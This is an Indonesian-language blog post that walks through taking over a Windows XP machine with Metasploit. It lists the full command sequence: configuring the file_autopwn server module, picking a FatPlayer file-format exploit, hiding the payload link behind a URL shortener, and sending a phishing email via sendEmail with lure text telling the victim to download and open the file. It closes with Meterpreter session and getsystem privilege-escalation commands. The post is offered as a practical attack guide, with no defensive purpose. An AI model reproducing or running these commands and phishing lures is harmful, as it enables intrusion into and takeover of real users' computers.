Ambil alih Wind*ws XP with Metsploit

Hal-hal yang dibutuhkan/requirement :
1. Metsploit framework, dapat didownload disini
2. SendEmail + SMTP details, dapat didownload disini

Nah..untuk mempermudah saya mengambil video dari sebuah blog yang menyediakannya agar pembelajaran dan pengertian tentang cara nya lebih mudah. dapat didownload disini

ok….mari kita mulai saja y,

Metode
* nyalakan layanan network kita dan mendapatkan alamat IP
* aktifkan metasploit dan konfigurasi file_autopwn
* Tunggu web server yang akan aktif
* File Browser yang tersedia dan melihat informasi yang satu tertentu.
* cari informasi homepage dan download
* lalu membuat URL palsu
* gunakan teknik social engineering dengan email ke target dengan semua informasi
* Tunggu untuk target untuk men-download file tersebut dan memuatnya dalam program
* Game Over
…hahaha kalo sekedar bicara seperti ny terlihat mudah y…tpi biar kita tidak bingung ini aku sertakan daftar comand line ny biar mudah deh..kakak.:

start-network
dhclient eth0
clear

msfconsole
search autopwn
use server/file_autopwn
show options
set LHOST 192.168.0.33
set SRVPORT 80
set URIPATH /
#set SSL true
#set ExitOnSession false
show options
#show advanced
#set CREATEFILES false
run

Firefox -> 192.168.0.33 -> Ctrl + F -> fatplayer

search fatplayer
info windows/fileformat/fatplayer_wav

Firefox -> http://www.shorturl.com -> http://192.168.0.33/windows_fileformat_videolan_tivo_msf.ty
Firefox -> Google -> FatPlayer -> Files -> Fat Player -> Fat Player 0.6b -> FatPlayer_06b_Win32.exe # http://sourceforge.net/projects/fatplayer/files/Fat%20Player/Fat%20Player%200.6b/FatPlayer_06b_Win32.exe/download

sendEmail -f “Attacker” -t [target]AT[target]DOT[target] -u “You’ve gonna listen to this” -m “O.M.G.
CHECK THIS OUT. You HAVE to listen to this as soon as you can [URL]

You’ll need to grab this ([URL]) to listen to this.” -s [smtp host] -xu [smtp user] -xp [smtp pass]

#IE -> [target’s online email] -> Login -> Download FatPlayer -> Install/Extract -> Click exploit link

sessions -l -v
sessions -i 1
sysinfo
getuid
getsystem
getuid

Maaf y untuk sumber info nya saya g bisa nampilin…ntar bisa bahaya…kalo pengen tahu sumbernya …tanya langsung ke saya saja y
oh iya….aku nyoba ny lewat backtrack y ..soal ny tinggal pake heheh

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s